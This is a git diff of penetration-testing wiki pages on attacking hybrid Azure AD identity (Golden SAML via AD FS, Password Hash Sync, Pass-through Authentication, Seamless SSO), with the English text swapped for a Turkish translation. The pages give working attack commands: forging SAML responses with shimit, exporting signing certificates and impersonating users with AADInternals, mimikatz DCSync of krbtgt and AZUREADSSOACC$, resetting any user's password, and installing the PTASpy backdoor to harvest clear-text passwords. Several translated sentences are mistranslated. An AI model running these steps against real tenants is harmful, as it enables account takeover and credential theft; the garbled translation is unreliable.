4. Son olarak, SP SAMLResponse'yi değerlendirir. Başarıyla doğrulanırsa, IdP ile bir güven ilişkisi olduğunu gösterir ve kullanıcıya erişim izni verilir. Bu, oturum açma sürecinin tamamlandığını işaret eder ve kullanıcı hizmeti kullanabilir.
**If you want to learn more about SAML authentication and common attacks go to:**
**SAML kimlik doğrulaması ve yaygın saldırılar hakkında daha fazla bilgi edinmek istiyorsanız:**
{{#ref}}
https://book.hacktricks.xyz/pentesting-web/saml-attacks
@@ -37,54 +37,53 @@ https://book.hacktricks.xyz/pentesting-web/saml-attacks
## Pivoting
- AD FS is a claims-based identity model.
- "..claimsaresimplystatements(forexample,name,identity,group), made about users, that are used primarily for authorizing access to claims-based applications located anywhere on the Internet."
- Claims for a user are written inside the SAML tokens and are then signed to provide confidentiality by the IdP.
- A user is identified by ImmutableID. It is globally unique and stored in Azure AD.
- TheImmuatbleIDisstoredon-premasms-DS-ConsistencyGuidforthe user and/or can be derived from the GUID of the user.
- More info in [https://learn.microsoft.com/en-us/windows-server/identity/ad-fs/technical-reference/the-role-of-claims](https://learn.microsoft.com/en-us/windows-server/identity/ad-fs/technical-reference/the-role-of-claims)
- AD FS, iddialara dayalı bir kimlik modelidir.
- "..iddialar, kullanıcılar hakkında yapılan (örneğin, ad, kimlik, grup) basit ifadelerdir ve esasen internet üzerinde herhangi bir yerde bulunan iddialara dayalı uygulamalara erişimi yetkilendirmek için kullanılır."
- Bir kullanıcı için iddialar SAML token'ları içinde yazılır ve ardından IdP tarafından gizlilik sağlamak için imzalanır.
- Bir kullanıcı ImmutableID ile tanımlanır. Bu, küresel olarak benzersizdir ve Azure AD'de saklanır.
- ImmutableID, kullanıcı için yerel ortamda ms-DS-ConsistencyGuid olarak saklanır ve/veya kullanıcının GUID'inden türetilebilir.
- Daha fazla bilgi için [https://learn.microsoft.com/en-us/windows-server/identity/ad-fs/technical-reference/the-role-of-claims](https://learn.microsoft.com/en-us/windows-server/identity/ad-fs/technical-reference/the-role-of-claims) adresine bakın.
**Golden SAML attack:**
**Golden SAML saldırısı:**
- In ADFS, SAML Response is signed by a token-signing certificate.
- If the certificate is compromised, it is possible to authenticate to the Azure AD as ANY user synced to Azure AD!
- Just like our PTA abuse, password change for a user or MFA won't have any effect because we are forging the authentication response.
- The certificate can be extracted from the AD FS server with DA privileges and then can be used from any internet connected machine.
- More info in [https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps](https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps)
- ADFS'de, SAML Yanıtı bir token imzalama sertifikası ile imzalanır.
- Sertifika tehlikeye girerse, Azure AD'ye herhangi bir kullanıcı olarak kimlik doğrulamak mümkündür!
- PTA istismarımız gibi, bir kullanıcı için şifre değişikliği veya MFA'nın etkisi olmayacaktır çünkü kimlik doğrulama yanıtını sahteleyerek işlem yapıyoruz.
- Sertifika, DA ayrıcalıkları ile AD FS sunucusundan çıkarılabilir ve ardından herhangi bir internet bağlantılı makineden kullanılabilir.
- Daha fazla bilgi için [https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps](https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps) adresine bakın.
### Golden SAML
The process where an **Identity Provider (IdP)** produces a **SAMLResponse** to authorize user sign-in is paramount. Depending on the IdP's specific implementation, the **response** might be **signed** or **encrypted** using the **IdP's private key**. This procedure enables the **Service Provider (SP)** to confirm the authenticity of the SAMLResponse, ensuring it was indeed issued by a trusted IdP.
Bir **Kimlik Sağlayıcı (IdP)** tarafından kullanıcı oturum açmasını yetkilendirmek için üretilen bir **SAMLResponse** süreci çok önemlidir. IdP'nin belirli uygulamasına bağlı olarak, **yanıt** **imzalanmış** veya **şifrelenmiş** olabilir ve bu işlem **IdP'nin özel anahtarı** kullanılarak gerçekleştirilir. Bu prosedür, **Hizmet Sağlayıcı (SP)**'nın SAMLResponse'nin gerçekliğini doğrulamasını sağlar ve bunun güvenilir bir IdP tarafından verildiğini garanti eder.
A parallel can be drawn with the [golden ticket attack](https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/golden-ticket), where the key authenticating the users identity and permissions (KRBTGT for golden tickets, token-signing private key for golden SAML) can be manipulated to **forge an authentication object** (TGT or SAMLResponse). This allows impersonation of any user, granting unauthorized access to the SP.
Kullanıcının kimliğini ve izinlerini doğrulayan anahtarın (golden ticket'lar için KRBTGT, golden SAML için token imzalama özel anahtarı) manipüle edilebileceği [golden ticket saldırısı](https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/golden-ticket) ile bir paralellik kurulabilir. Bu, herhangi bir kullanıcının taklit edilmesine ve SP'ye yetkisiz erişim sağlanmasına olanak tanır.
Golden SAMLs offer certain advantages:
Golden SAML'ler belirli avantajlar sunar:
- They can be **created remotely**, without the need to be part of the domain or federation in question.
- They remain effective even with **Two-Factor Authentication (2FA)** enabled.
- The token-signing **private key does not automatically renew**.
- **Changing a users password does not invalidate** an already generated SAML.
- **Uzakta** oluşturulabilirler, ilgili alan veya federasyonun parçası olma gerekliliği yoktur.
- **İki Aşamalı Kimlik Doğrulama (2FA)** etkin olsa bile etkili kalırlar.
- Token imzalama **özel anahtarı otomatik olarak yenilenmez**.
- **Bir kullanıcının şifresini değiştirmek,** zaten oluşturulmuş bir SAML'yi geçersiz kılmaz.
#### AWS + AD FS + Golden SAML
[Active Directory Federation Services (AD FS)](<https://docs.microsoft.com/en-us/previous-versions/windows/server-2008/bb897402(v=msdn.10)>) is a Microsoft service that facilitates the **secure exchange of identity information** between trusted business partners (federation). It essentially allows a domain service to share user identities with other service providers within a federation.
[Active Directory Federation Services (AD FS)](<https://docs.microsoft.com/en-us/previous-versions/windows/server-2008/bb897402(v=msdn.10)>) Microsoft'un güvenilir iş ortakları (federasyon) arasında **kimlik bilgilerini güvenli bir şekilde değiştirmeyi** kolaylaştıran bir hizmetidir. Temelde, bir alan hizmetinin, bir federasyon içindeki diğer hizmet sağlayıcılarla kullanıcı kimliklerini paylaşmasına olanak tanır.
With AWS trusting the compromised domain (in a federation), this vulnerability can be exploited to potentially **acquire any permissions in the AWS environment**. The attack necessitates the **private key used to sign the SAML objects**, akin to needing the KRBTGT in a golden ticket attack. Access to the AD FS user account is sufficient to obtain this private key.
AWS, tehlikeye giren alanı (bir federasyonda) güvenilir kabul ettiğinde, bu zafiyet, AWS ortamında **herhangi bir izin elde etme** potansiyeli taşır. Saldırı, SAML nesnelerini imzalamak için kullanılan **özel anahtarı** gerektirir; bu, golden ticket saldırısında KRBTGT'yi gerektirmeye benzer. AD FS kullanıcı hesabına erişim, bu özel anahtarı elde etmek için yeterlidir.
The requirements for executing a golden SAML attack include:
Golden SAML saldırısını gerçekleştirmek için gerekenler şunlardır:
- **Token-signing private key**
- **IdP public certificate**
- **IdP name**
- **Role name (role to assume)**
- Domain\username
- Role session name in AWS
- Amazon account ID
- **Token imzalama özel anahtarı**
- **IdP genel sertifikası**
- **IdP adı**
- **Rol adı (üstlenilecek rol)**
- Alan\kullanıcı adı
- AWS'deki rol oturum adı
- Amazon hesap kimliği
_Only the items in bold are mandatory. The others can be filled in as desired._
To acquire the **private key**, access to the **AD FS user account** is necessary. From there, the private key can be **exported from the personal store** using tools like [mimikatz](https://github.com/gentilkiwi/mimikatz). To gather the other required information, you can utilize the Microsoft.Adfs.Powershell snapin as follows, ensuring you're logged in as the ADFS user:
_Sadece kalın yazılı olanlar zorunludur. Diğerleri istenildiği gibi doldurulabilir._
**Özel anahtarı** elde etmek için **AD FS kullanıcı hesabına** erişim gereklidir. Buradan, özel anahtar [mimikatz](https://github.com/gentilkiwi/mimikatz) gibi araçlar kullanılarak **kişisel depodan dışa aktarılabilir**. Diğer gerekli bilgileri toplamak için Microsoft.Adfs.Powershell snapin'ini şu şekilde kullanabilirsiniz, ADFS kullanıcısı olarak oturum açtığınızdan emin olun:
```powershell
# From an "AD FS" session
# After having exported the key with mimikatz
@@ -98,9 +97,7 @@ To acquire the **private key**, access to the **AD FS user account** is necessar
# Role Name
(Get-ADFSRelyingPartyTrust).IssuanceTransformRule
```
With all the information, it's possible to forget a valid SAMLResponse as the user you want to impersonate using [**shimit**](https://github.com/cyberark/shimit)**:**
Tüm bilgilerle, taklit etmek istediğiniz kullanıcı olarak geçerli bir SAMLResponse unutmak mümkündür [**shimit**](https://github.com/cyberark/shimit)**:**
```bash
# Apply session for AWS cli
python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file -c cert_file -u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id 123456789012
@@ -115,11 +112,9 @@ python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file -
# Save SAMLResponse to file
python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file -c cert_file -u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id 123456789012 -o saml_response.xml
```
<figure><img src="../../../../images/image (128).png" alt=""><figcaption></figcaption></figure>
### On-prem -> cloud
### Yerel -> bulut
```powershell
# With a domain user you can get the ImmutableID of the target user
[System.Convert]::ToBase64String((Get-ADUser -Identity <username> | select -ExpandProperty ObjectGUID).tobytearray())
@@ -138,9 +133,7 @@ Export-AADIntADFSSigningCertificate
# Impersonate a user to to access cloud apps
Open-AADIntOffice365Portal -ImmutableID v1pOC7Pz8kaT6JWtThJKRQ== -Issuer http://deffin.com/adfs/services/trust -PfxFileName C:\users\adfsadmin\Documents\ADFSSigningCertificate.pfx -Verbose
```
It's also possible to create ImmutableID of cloud only users and impersonate them
Aynı zamanda yalnızca bulut kullanıcılarının ImmutableID'sini oluşturmak ve onları taklit etmek de mümkündür.
```powershell
# Create a realistic ImmutableID and set it for a cloud only user
[System.Convert]::ToBase64String((New-Guid).tobytearray())
@@ -152,14 +145,9 @@ Export-AADIntADFSSigningCertificate
# Impersonate the user
Open-AADIntOffice365Portal -ImmutableID "aodilmsic30fugCUgHxsnK==" -Issuer http://deffin.com/adfs/services/trust -PfxFileName C:\users\adfsadmin\Desktop\ADFSSigningCertificate.pfx -Verbose
```
## References
## Referanslar
- [https://learn.microsoft.com/en-us/azure/active-directory/hybrid/whatis-fed](https://learn.microsoft.com/en-us/azure/active-directory/hybrid/whatis-fed)
- [https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps](https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps)
{{#include ../../../../banners/hacktricks-training.md}}

68
src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.md
View File

@@ -1,46 +1,45 @@
# Az - PHS - Password Hash Sync
# Az - PHS - Parola Hash Senkronizasyonu
{{#include ../../../../banners/hacktricks-training.md}}
## Basic Information
## Temel Bilgiler
[From the docs:](https://learn.microsoft.com/en-us/entra/identity/hybrid/connect/whatis-phs) **Password hash synchronization** is one of the sign-in methods used to accomplish hybrid identity. **Azure AD Connect** synchronizes a hash, of the hash, of a user's password from an on-premises Active Directory instance to a cloud-based Azure AD instance.
[Belgelerden:](https://learn.microsoft.com/en-us/entra/identity/hybrid/connect/whatis-phs) **Parola hash senkronizasyonu**, hibrit kimlik elde etmek için kullanılan oturum açma yöntemlerinden biridir. **Azure AD Connect**, bir kullanıcının parolasının hash'inin, on-premises Active Directory örneğinden bulut tabanlı Azure AD örneğine senkronize edilmesini sağlar.
<figure><img src="../../../../images/image (173).png" alt=""><figcaption></figcaption></figure>
It's the **most common method** used by companies to synchronize an on-prem AD with Azure AD.
Bu, şirketler tarafından on-prem AD'yi Azure AD ile senkronize etmek için kullanılan **en yaygın yöntemdir**.
All **users** and a **hash of the password hashes** are synchronized from the on-prem to Azure AD. However, **clear-text passwords** or the **original** **hashes** aren't sent to Azure AD.\
Moreover, **Built-in** security groups (like domain admins...) are **not synced** to Azure AD.
Tüm **kullanıcılar** ve **parola hash'lerinin hash'i** on-prem'den Azure AD'ye senkronize edilir. Ancak, **düz metin parolalar** veya **orijinal** **hash'ler** Azure AD'ye gönderilmez.\
Ayrıca, **Yerleşik** güvenlik grupları (alan yöneticileri gibi...) **Azure AD'ye senkronize edilmez**.
The **hashes syncronization** occurs every **2 minutes**. However, by default, **password expiry** and **account** **expiry** are **not sync** in Azure AD. So, a user whose **on-prem password is expired** (not changed) can continue to **access Azure resources** using the old password.
**Hash senkronizasyonu** her **2 dakikada** bir gerçekleşir. Ancak, varsayılan olarak, **parola süresi dolma** ve **hesap** **süresi dolma** Azure AD'de **senkronize edilmez**. Bu nedenle, **on-prem parolasının süresi dolmuş** (değiştirilmemiş) bir kullanıcı, eski parolayı kullanarak **Azure kaynaklarına erişmeye devam edebilir**.
When an on-prem user wants to access an Azure resource, the **authentication takes place on Azure AD**.
Bir on-prem kullanıcısı bir Azure kaynağına erişmek istediğinde, **kimlik doğrulama Azure AD'de gerçekleşir**.
**PHS** is required for features like **Identity Protection** and AAD Domain Services.
**PHS**, **Kimlik Koruma** ve AAD Alan Hizmetleri gibi özellikler için gereklidir.
## Pivoting
## Pivotlama
When PHS is configured some **privileged accounts** are automatically **created**:
PHS yapılandırıldığında bazı **ayrıcalıklı hesaplar** otomatik olarak **oluşturulur**:
- The account **`MSOL_<installationID>`** is automatically created in on-prem AD. This account is given a **Directory Synchronization Accounts** role (see [documentation](https://docs.microsoft.com/en-us/azure/active-directory/users-groups-roles/directory-assign-admin-roles#directory-synchronization-accounts-permissions)) which means that it has **replication (DCSync) permissions in the on-prem AD**.
- An account **`Sync_<name of on-prem ADConnect Server>_installationID`** is created in Azure AD. This account can **reset password of ANY user** (synced or cloud only) in Azure AD.
- **`MSOL_<installationID>`** hesabı, on-prem AD'de otomatik olarak oluşturulur. Bu hesaba **Dizin Senkronizasyon Hesapları** rolü verilir (bkz. [belgeler](https://docs.microsoft.com/en-us/azure/active-directory/users-groups-roles/directory-assign-admin-roles#directory-synchronization-accounts-permissions)), bu da onun **on-prem AD'de çoğaltma (DCSync) izinlerine sahip olduğu anlamına gelir**.
- Azure AD'de **`Sync_<on-prem ADConnect Sunucusunun adı>_installationID`** adlı bir hesap oluşturulur. Bu hesap, Azure AD'deki **HERHANGİ bir kullanıcının** (senkronize edilmiş veya yalnızca bulut) parolasını **sıfırlayabilir**.
Passwords of the two previous privileged accounts are **stored in a SQL server** on the server where **Azure AD Connect is installed.** Admins can extract the passwords of those privileged users in clear-text.\
The database is located in `C:\Program Files\Microsoft Azure AD Sync\Data\ADSync.mdf`.
Önceki iki ayrıcalıklı hesabın parolaları, **Azure AD Connect'in kurulu olduğu sunucudaki bir SQL sunucusunda** **saklanır**. Yöneticiler, bu ayrıcalıklı kullanıcıların parolalarını düz metin olarak çıkarabilir.\
Veritabanası `C:\Program Files\Microsoft Azure AD Sync\Data\ADSync.mdf` konumundadır.
It's possible to extract the configuration from one of the tables, being one encrypted:
Şifrelenmiş olan bir tablo üzerinden yapılandırmayı çıkarmak mümkündür:
`SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent;`
The **encrypted configuration** is encrypted with **DPAPI** and it contains the **passwords of the `MSOL_*`** user in on-prem AD and the password of **Sync\_\*** in AzureAD. Therefore, compromising these it's possible to privesc to the AD and to AzureAD.
**Şifrelenmiş yapılandırma**, **DPAPI** ile şifrelenmiştir ve **on-prem AD'deki `MSOL_*`** kullanıcısının parolalarını ve AzureAD'deki **Sync\_\*** parolasını içerir. Bu nedenle, bunları ele geçirerek AD ve AzureAD'ye ayrıcalıklı erişim sağlamak mümkündür.
You can find a [full overview of how these credentials are stored and decrypted in this talk](https://www.youtube.com/watch?v=JEIR5oGCwdg).
Bu kimlik bilgilerin nasıl saklandığı ve çözüldüğüne dair [tam bir genel bakış bu konuşmada bulunmaktadır](https://www.youtube.com/watch?v=JEIR5oGCwdg).
### Finding the **Azure AD connect server**
If the **server where Azure AD connect is installed** is domain joined (recommended in the docs), it's possible to find it with:
### **Azure AD connect sunucusunu bulma**
Eğer **Azure AD connect'in kurulu olduğu sunucu** alan katılmışsa (belgelerde önerilmektedir), onu bulmak için:
```powershell
# ActiveDirectory module
Get-ADUser -Filter "samAccountName -like 'MSOL_*'" - Properties * | select SamAccountName,Description | fl
@@ -48,9 +47,7 @@ Get-ADUser -Filter "samAccountName -like 'MSOL_*'" - Properties * | select SamAc
#Azure AD module
Get-AzureADUser -All $true | ?{$_.userPrincipalName -match "Sync_"}
```
### Abusing MSOL\_\*
### MSOL\_*'yi Kötüye Kullanma
```powershell
# Once the Azure AD connect server is compromised you can extract credentials with the AADInternals module
Get-AADIntSyncCredentials
@@ -59,14 +56,12 @@ Get-AADIntSyncCredentials
runas /netonly /user:defeng.corp\MSOL_123123123123 cmd
Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\krbtgt /domain:domain.local /dc:dc.domain.local"'
```
> [!CAUTION]
> You can also use [**adconnectdump**](https://github.com/dirkjanm/adconnectdump) to obtain these credentials.
> Bu kimlik bilgilerini elde etmek için [**adconnectdump**](https://github.com/dirkjanm/adconnectdump) aracını da kullanabilirsiniz.
### Abusing Sync\_\*
Compromising the **`Sync_*`** account it's possible to **reset the password** of any user (including Global Administrators)
### Sync\_\* İstismarı
**`Sync_*`** hesabını ele geçirerek, herhangi bir kullanıcının (Global Yöneticiler dahil) **şifresini sıfırlamak** mümkündür.
```powershell
# This command, run previously, will give us alse the creds of this account
Get-AADIntSyncCredentials
@@ -87,9 +82,7 @@ Set-AADIntUserPassword -SourceAnchor "3Uyg19ej4AHDe0+3Lkc37Y9=" -Password "JustA
# Now it's possible to access Azure AD with the new password and op-prem with the old one (password changes aren't sync)
```
It's also possible to **modify the passwords of only cloud** users (even if that's unexpected)
Aynı zamanda **sadece bulut** kullanıcılarının şifrelerini değiştirmek de mümkündür (bu beklenmedik olsa bile)
```powershell
# To reset the password of cloud only user, we need their CloudAnchor that can be calculated from their cloud objectID
# The CloudAnchor is of the format USER_ObjectID.
@@ -98,15 +91,14 @@ Get-AADIntUsers | ?{$_.DirSyncEnabled -ne "True"} | select UserPrincipalName,Obj
# Reset password
Set-AADIntUserPassword -CloudAnchor "User_19385ed9-sb37-c398-b362-12c387b36e37" -Password "JustAPass12343.%" -Verbosewers
```
It's also possible to dump the password of this user.
Kullanıcının şifresini dökmek de mümkündür.
> [!CAUTION]
> Another option would be to **assign privileged permissions to a service principal**, which the **Sync** user has **permissions** to do, and then **access that service principal** as a way of privesc.
> Başka bir seçenek, **Sync** kullanıcısının **izinlere** sahip olduğu bir **hizmet ilkesi** için **ayrıcalıklı izinler atamak** ve ardından **o hizmet ilkesine erişmek** olarak privesc yöntemidir.
### Seamless SSO
It's possible to use Seamless SSO with PHS, which is vulnerable to other abuses. Check it in:
PHS ile Seamless SSO kullanmak mümkündür, bu da diğer kötüye kullanımlara açıktır. Bunu kontrol edin:
{{#ref}}
seamless-sso.md
@@ -120,7 +112,3 @@ seamless-sso.md
- [https://www.youtube.com/watch?v=xei8lAPitX8](https://www.youtube.com/watch?v=xei8lAPitX8)
{{#include ../../../../banners/hacktricks-training.md}}

50
src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/pta-pass-through-authentication.md
View File

@@ -2,61 +2,57 @@
{{#include ../../../../banners/hacktricks-training.md}}
## Basic Information
## Temel Bilgiler
[From the docs:](https://learn.microsoft.com/en-us/entra/identity/hybrid/connect/how-to-connect-pta) Azure Active Directory (Azure AD) Pass-through Authentication allows your users to **sign in to both on-premises and cloud-based applications using the same passwords**. This feature provides your users a better experience - one less password to remember, and reduces IT helpdesk costs because your users are less likely to forget how to sign in. When users sign in using Azure AD, this feature **validates users' passwords directly against your on-premises Active Directory**.
[Belgelerden:](https://learn.microsoft.com/en-us/entra/identity/hybrid/connect/how-to-connect-pta) Azure Active Directory (Azure AD) Pass-through Authentication, kullanıcılarınızın **hem yerel hem de bulut tabanlı uygulamalara aynı şifreleri kullanarak giriş yapmalarını** sağlar. Bu özellik, kullanıcılarınıza daha iyi bir deneyim sunar - hatırlanacak bir şifre daha az ve IT yardım masası maliyetlerini azaltır çünkü kullanıcılarınızın giriş yapmayı unutma olasılığı daha düşüktür. Kullanıcılar Azure AD kullanarak giriş yaptığında, bu özellik **kullanıcıların şifrelerini doğrudan yerel Active Directory'nizle doğrular**.
In PTA **identities** are **synchronized** but **passwords** **aren't** like in PHS.
PTA'da **kimlikler** **senkronize** edilir ancak **şifreler** PHS'deki gibi **senkronize edilmez**.
The authentication is validated in the on-prem AD and the communication with cloud is done by an **authentication agent** running in an **on-prem server** (it does't need to be on the on-prem DC).
Kimlik doğrulama yerel AD'de doğrulanır ve bulutla iletişim, **yerel bir sunucuda** çalışan bir **kimlik doğrulama ajanı** tarafından gerçekleştirilir (yerel DC'de olması gerekmez).
### Authentication flow
### Kimlik Doğrulama Akışı
<figure><img src="../../../../images/image (92).png" alt=""><figcaption></figcaption></figure>
1. To **login** the user is redirected to **Azure AD**, where he sends the **username** and **password**
2. The **credentials** are **encrypted** and set in a **queue** in Azure AD
3. The **on-prem authentication agent** gathers the **credentials** from the queue and **decrypts** them. This agent is called **"Pass-through authentication agent"** or **PTA agent.**
4. The **agent** **validates** the creds against the **on-prem AD** and sends the **response** **back** to Azure AD which, if the response is positive, **completes the login** of the user.
1. Kullanıcı **giriş yapmak** için **Azure AD'ye** yönlendirilir, burada **kullanıcı adı** ve **şifre** gönderir.
2. **Kimlik bilgileri** **şifrelenir** ve Azure AD'de bir **kuvvet** içine yerleştirilir.
3. **Yerel kimlik doğrulama ajanı**, kuyruktan **kimlik bilgilerini** toplar ve **şifreler**. Bu ajana **"Pass-through authentication agent"** veya **PTA ajanı** denir.
4. **Ajan**, kimlik bilgilerini **yerel AD** ile doğrular ve **yanıtı** **Azure AD'ye geri** gönderir; eğer yanıt olumluysa, **kullanıcının girişini tamamlar**.
> [!WARNING]
> If an attacker **compromises** the **PTA** he can **see** the all **credentials** from the queue (in **clear-text**).\
> He can also **validate any credentials** to the AzureAD (similar attack to Skeleton key).
> Eğer bir saldırgan **PTA'yı ele geçirirse**, kuyruktaki tüm **kimlik bilgilerini** (şifrelenmemiş olarak) **görebilir**.\
> Ayrıca AzureAD'ye **herhangi bir kimlik bilgisini doğrulayabilir** (Skeleton key'e benzer bir saldırı).
### On-Prem -> cloud
If you have **admin** access to the **Azure AD Connect server** with the **PTA** **agent** running, you can use the **AADInternals** module to **insert a backdoor** that will **validate ALL the passwords** introduced (so all passwords will be valid for authentication):
### Yerel -> bulut
Eğer **PTA** **ajanı** çalışan **Azure AD Connect sunucusuna** **yönetici** erişiminiz varsa, **Tüm şifreleri** doğrulayacak bir **arka kapı** **eklemek için** **AADInternals** modülünü kullanabilirsiniz:
```powershell
Install-AADIntPTASpy
```
> [!NOTE]
> If the **installation fails**, this is probably due to missing [Microsoft Visual C++ 2015 Redistributables](https://download.microsoft.com/download/6/A/A/6AA4EDFF-645B-48C5-81CC-ED5963AEAD48/vc_redist.x64.exe).
It's also possible to **see the clear-text passwords sent to PTA agent** using the following cmdlet on the machine where the previous backdoor was installed:
> Eğer **kurulum başarısız olursa**, bu muhtemelen eksik [Microsoft Visual C++ 2015 Redistributables](https://download.microsoft.com/download/6/A/A/6AA4EDFF-645B-48C5-81CC-ED5963AEAD48/vc_redist.x64.exe) kaynaklıdır.
Ayrıca, **önceki arka kapının kurulu olduğu makinede** aşağıdaki cmdlet'i kullanarak PTA ajanına gönderilen düz metin şifrelerini **görmek** de mümkündür:
```powershell
Get-AADIntPTASpyLog -DecodePasswords
```
This backdoor will:
- Create a hidden folder `C:\PTASpy`
- Copy a `PTASpy.dll` to `C:\PTASpy`
- Injects `PTASpy.dll` to `AzureADConnectAuthenticationAgentService` process
- Gizli bir klasör oluşturacak `C:\PTASpy`
- `PTASpy.dll` dosyasını `C:\PTASpy`'ye kopyalayacak
- `PTASpy.dll` dosyasını `AzureADConnectAuthenticationAgentService` sürecine enjekte edecek
> [!NOTE]
> When the AzureADConnectAuthenticationAgent service is restarted, PTASpy is “unloaded” and must be re-installed.
> AzureADConnectAuthenticationAgent servisi yeniden başlatıldığında, PTASpy "boşaltılır" ve yeniden yüklenmesi gerekir.
### Cloud -> On-Prem
> [!CAUTION]
> After getting **GA privileges** on the cloud, it's possible to **register a new PTA agent** by setting it on an **attacker controlled machine**. Once the agent is **setup**, we can **repeat** the **previous** steps to **authenticate using any password** and also, **get the passwords in clear-text.**
> Bulutta **GA ayrıcalıkları** alındıktan sonra, **saldırgan kontrolündeki bir makinede** yeni bir PTA ajanı **kaydetmek** mümkündür. Ajan **kurulduktan** sonra, **herhangi bir şifre** kullanarak **kimlik doğrulama** yapmak için **önceki** adımları **tekrarlayabiliriz** ve ayrıca, **şifreleri düz metin olarak alabiliriz.**
### Seamless SSO
It's possible to use Seamless SSO with PTA, which is vulnerable to other abuses. Check it in:
PTA ile Seamless SSO kullanmak mümkündür, bu da diğer kötüye kullanımlara karşı savunmasızdır. Bunu kontrol edin:
{{#ref}}
seamless-sso.md
@@ -68,7 +64,3 @@ seamless-sso.md
- [https://aadinternals.com/post/on-prem_admin/#pass-through-authentication](https://aadinternals.com/post/on-prem_admin/#pass-through-authentication)
{{#include ../../../../banners/hacktricks-training.md}}

90
src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/seamless-sso.md
View File

@@ -2,30 +2,29 @@
{{#include ../../../../banners/hacktricks-training.md}}
## Basic Information
## Temel Bilgiler
[From the docs:](https://learn.microsoft.com/en-us/entra/identity/hybrid/connect/how-to-connect-sso) Azure Active Directory Seamless Single Sign-On (Azure AD Seamless SSO) automatically **signs users in when they are on their corporate devices** connected to your corporate network. When enabled, **users don't need to type in their passwords to sign in to Azure AD**, and usually, even type in their usernames. This feature provides your users easy access to your cloud-based applications without needing any additional on-premises components.
[Belgelerden:](https://learn.microsoft.com/en-us/entra/identity/hybrid/connect/how-to-connect-sso) Azure Active Directory Seamless Single Sign-On (Azure AD Seamless SSO), **kullanıcıları kurumsal ağınıza bağlı kurumsal cihazlarında otomatik olarak oturum açtırır**. Etkinleştirildiğinde, **kullanıcıların Azure AD'ye oturum açmak için şifrelerini girmeleri gerekmez** ve genellikle kullanıcı adlarını bile girmeleri gerekmez. Bu özellik, kullanıcılarınıza ek bir yerel bileşen gerektirmeden bulut tabanlı uygulamalarınıza kolay erişim sağlar.
<figure><img src="../../../../images/image (275).png" alt=""><figcaption><p><a href="https://learn.microsoft.com/en-us/entra/identity/hybrid/connect/how-to-connect-sso-how-it-works">https://learn.microsoft.com/en-us/entra/identity/hybrid/connect/how-to-connect-sso-how-it-works</a></p></figcaption></figure>
Basically Azure AD Seamless SSO **signs users** in when they are **on a on-prem domain joined PC**.
Temelde Azure AD Seamless SSO, **kullanıcıları** **yerel bir alan bağlı PC'de** **oturum açtırır**.
It's supported by both [**PHS (Password Hash Sync)**](phs-password-hash-sync.md) and [**PTA (Pass-through Authentication)**](pta-pass-through-authentication.md).
Bu, hem [**PHS (Şifre Hash Senkronizasyonu)**](phs-password-hash-sync.md) hem de [**PTA (Geçiş Kimlik Doğrulama)**](pta-pass-through-authentication.md) tarafından desteklenmektedir.
Desktop SSO is using **Kerberos** for authentication. When configured, Azure AD Connect creates a **computer account called AZUREADSSOACC`$`** in on-prem AD. The password of the `AZUREADSSOACC$` account is **sent as plain-text to Azure AD** during the configuration.
Masaüstü SSO, kimlik doğrulama için **Kerberos** kullanmaktadır. Yapılandırıldığında, Azure AD Connect, yerel AD'de **AZUREADSSOACC`$` adında bir bilgisayar hesabı oluşturur**. `AZUREADSSOACC$` hesabının şifresi, yapılandırma sırasında **Azure AD'ye düz metin olarak gönderilir**.
The **Kerberos tickets** are **encrypted** using the **NTHash (MD4)** of the password and Azure AD is using the sent password to decrypt the tickets.
**Kerberos biletleri**, şifrenin **NTHash (MD4)** kullanılarak **şifrelenir** ve Azure AD, gönderilen şifreyi biletleri şifrelerini çözmek için kullanır.
**Azure AD** exposes an **endpoint** (https://autologon.microsoftazuread-sso.com) that accepts Kerberos **tickets**. Domain-joined machine's browser forwards the tickets to this endpoint for SSO.
**Azure AD**, Kerberos **biletlerini** kabul eden bir **uç nokta** (https://autologon.microsoftazuread-sso.com) sunar. Alan bağlı makinenin tarayıcısı, SSO için bu uç noktaya biletleri iletir.
### On-prem -> cloud
The **password** of the user **`AZUREADSSOACC$` never changes**. Therefore, a domain admin could compromise the **hash of this account**, and then use it to **create silver tickets** to connect to Azure with **any on-prem user synced**:
### Yerel -> bulut
Kullanıcının **`AZUREADSSOACC$`** şifresi **asla değişmez**. Bu nedenle, bir alan yöneticisi bu hesabın **hash'ini ele geçirebilir** ve ardından **herhangi bir yerel kullanıcı senkronize edilmiş** olarak Azure'a bağlanmak için **gümüş biletler** oluşturmak için kullanabilir:
```powershell
# Dump hash using mimikatz
Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\azureadssoacc$ /domain:domain.local /dc:dc.domain.local"'
mimikatz.exe "lsadump::dcsync /user:AZUREADSSOACC$" exit
mimikatz.exe "lsadump::dcsync /user:AZUREADSSOACC$" exit
# Dump hash using https://github.com/MichaelGrafnetter/DSInternals
Get-ADReplAccount -SamAccountName 'AZUREADSSOACC$' -Domain contoso -Server lon-dc1.contoso.local
@@ -39,9 +38,7 @@ Import-Module DSInternals
$key = Get-BootKey -SystemHivePath 'C:\temp\registry\SYSTEM'
